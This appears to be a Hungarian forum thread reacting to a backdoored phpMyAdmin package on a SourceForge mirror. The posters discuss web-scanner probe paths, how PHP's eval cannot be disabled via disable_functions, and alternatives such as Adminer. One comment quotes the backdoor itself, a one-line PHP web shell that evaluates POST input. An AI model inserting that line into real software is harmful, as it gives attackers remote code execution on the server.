- A hozzászóláshoz be kell jelentkezni
- 3875 megtekintés
Hozzászólások
Élvezem nézni az apache logot, néha többen hívnák a */phpmyadmin és társai oldalt mint az eredetit :D Ez a sourceforge részére kellemetlen, mert hogy fertőzött anyag van egy XXdowload.tre oldalon az okés, de egy ilyen oldalon érdekes. Lehet hamarosan hashleni kell a tükrökön időnként.
- A hozzászóláshoz be kell jelentkezni
Múltkor én is meglepődtem, hogy milyen sokan bepróbálkoznak ezzel. Valószínűleg a phpMyAdmin önmagában backdoor, a kérdéses kód nélkül is :)
--
#nosql Riak skálázódás a Kiip-nél: 25 millió művelet/nap
- A hozzászóláshoz be kell jelentkezni
Óhát... /admin, /pma, /mysql, /myadmin, hogy csak a jéghegy csúcsát mondjam... :)
- A hozzászóláshoz be kell jelentkezni
Az én kedvenceim a fentieken felül még a: /user/soapCaller.bs, /vtigercrm/
--
openSUSE 11.4
- A hozzászóláshoz be kell jelentkezni
dejavu :)
--
HUPbeszolas FF extension
- A hozzászóláshoz be kell jelentkezni
Egy arstechnica-s cikk szerint az alábbi kódot tartalmazza ez a fájl:
<?php @eval($_POST['c']);
Na most jobb helyeken az eval benne van a disable_functions-ben, szóval igazán súlyosan ez csak a szarul konfigolt szervereket érintené, nem?
- A hozzászóláshoz be kell jelentkezni
Koncentrálj, mert nagy titkot árulok most el:
a "disable_functions=eval" nem tiltja le az eval-t, szóval igazán súlyosan érintheti a te rendszeredet is, ha csak erre bíztad a védelmét... ;)
- A hozzászóláshoz be kell jelentkezni
hja, mert nyelvi elem...
- A hozzászóláshoz be kell jelentkezni
ja, ha így működne akkor ennyi erővel le lehetne tiltani az array()-t is.. nagy poén lenne :D
--
CyclonePHP
- A hozzászóláshoz be kell jelentkezni
:D
- A hozzászóláshoz be kell jelentkezni
Igazabol semmi okat nem latom annak, hogy akar az is tilthato legyen. Az mas dolog, hogy jelenleg nem az.
- A hozzászóláshoz be kell jelentkezni
"disable_functions" -->letiltani_az_függvénytet
array(), eval() --> nem függvény (eval: "Because this is a language construct and not a function, it cannot be called using variable functions." illetve "Note: array() is a language construct used to represent literal arrays, and not a regular function.")
forrás: rtfm
- A hozzászóláshoz be kell jelentkezni
Igen, ezek nem fuggvenyek. Igen, latom, hogy nem lehet oket igy tiltani.
Azonban en csak azt mondtam, hogy akar azok is tilthatoak lennenek. Ertsd: nincs technikai oka annak, hogy ne lehessen egy ilyen feature-t implementalni. Ha valahova nagyon kene, akkor lehet patchelgetni...
Az rtfm-eddel meg tudod hova mehetsz. :)
- A hozzászóláshoz be kell jelentkezni
onnan jottem :D
- A hozzászóláshoz be kell jelentkezni
Jó pap holtig...
Köszi!
- A hozzászóláshoz be kell jelentkezni
Az eval()nem funkció, így a "disable_functions=" nem hatja meg.
Jellemzően Suhosin-nal tiltják:
suhosin.executor.disable_eval=on.
- A hozzászóláshoz be kell jelentkezni
a function magyarul fuggveny ;)
(tudom, viccesen nez ki igy ekezetek nelkul, de ez van. A hozzaszolas celja nem az elozo hozzaszolo barmilyen szintu megsertese volt.)
- A hozzászóláshoz be kell jelentkezni
Önnek igaza van a magyarítás terén! :) A hozzászólás többi részét tartom.
- A hozzászóláshoz be kell jelentkezni
ebből látszik, milyen menő a pma...
- A hozzászóláshoz be kell jelentkezni
Ez gondolom dob a sourcefoge.net hírnevén :)
- A hozzászóláshoz be kell jelentkezni
Opensource...
- A hozzászóláshoz be kell jelentkezni
:D ezt te sem gondoltad komolyan... :)
- A hozzászóláshoz be kell jelentkezni
Benézett, tüsszentett, majd megnyomta a Beküldés gombot.
Ez lett belőle.
- A hozzászóláshoz be kell jelentkezni
Hogy mondjak...? Aki phpMyAdmint hasznal, meg is erdemli? :)
- A hozzászóláshoz be kell jelentkezni
Megjegyzem nem a pma hibája ez az eset, úgyhogy nem igazán értem hogy ezt miért írod.
Amúgy is mit használjon aki nem azt használ? Gondolom oka van annak, hogy mindenhol ezzel találja magát szemben az ember, csak sejtem hogy azért, mert nincs használhatóbb alternatíva, legalábbis webes formában. Vagy ha van miért nem hallani róla?
- A hozzászóláshoz be kell jelentkezni
"Megjegyzem nem a pma hibája ez az eset, úgyhogy nem igazán értem hogy ezt miért írod."
Persze, de elterjedtsege miatt jobb kerulni. :)
"Amúgy is mit használjon aki nem azt használ?"
En pl. azt a verziot valasztottam, hogy nem hasznalok erre webes eszkozt. Egyelore jol birom nelkule. Ha megis kene, akkor is inkabb masik porton, meg egy jelszoval vedve, es csak szukseg eseten inditva hasznalnam. Egyszeruen nincs helye ilyen cuccnak a publikus cuccok mellett.
- A hozzászóláshoz be kell jelentkezni
Persze, de elterjedtsege miatt jobb kerulni. :)
Ah, megvilagosodtam, miert Linuxozik itt sok ember :)
- A hozzászóláshoz be kell jelentkezni
pl. adminer-t. nem csak mysql-t támogat, ajaxos, egy darab fájl és nem 14 megás fájlhányadék. ugyanúgy magyarítva is van, és tárolt eljárások eredményét is megmutatja, ellenben a pma-val, ami az esetek nagy részében megdöglik tőle.
De elég megnézni ezt: http://www.adminer.org/en/phpmyadmin/
- A hozzászóláshoz be kell jelentkezni
Teljesen szimpatikusnak néz ki gyors pillantások után, megnézem közelebbről :)
update: Így méginkább az
- A hozzászóláshoz be kell jelentkezni
Arra probaltam celozni, hogy nem kell feltetlen patkolni a cuccot, hogy backdoor legyen benne. Eleg bugos igy is, legalabbis regebben az volt.
Nem tudom mit kell hasznalni helyette... a nagyon keves esetbol amikor szuksegem volt ilyenre, siman gyartottam magamnak sajat toolt, szerintem nem egy megoldhatatlan dolog irni valami biztonsagos alternativat.
- A hozzászóláshoz be kell jelentkezni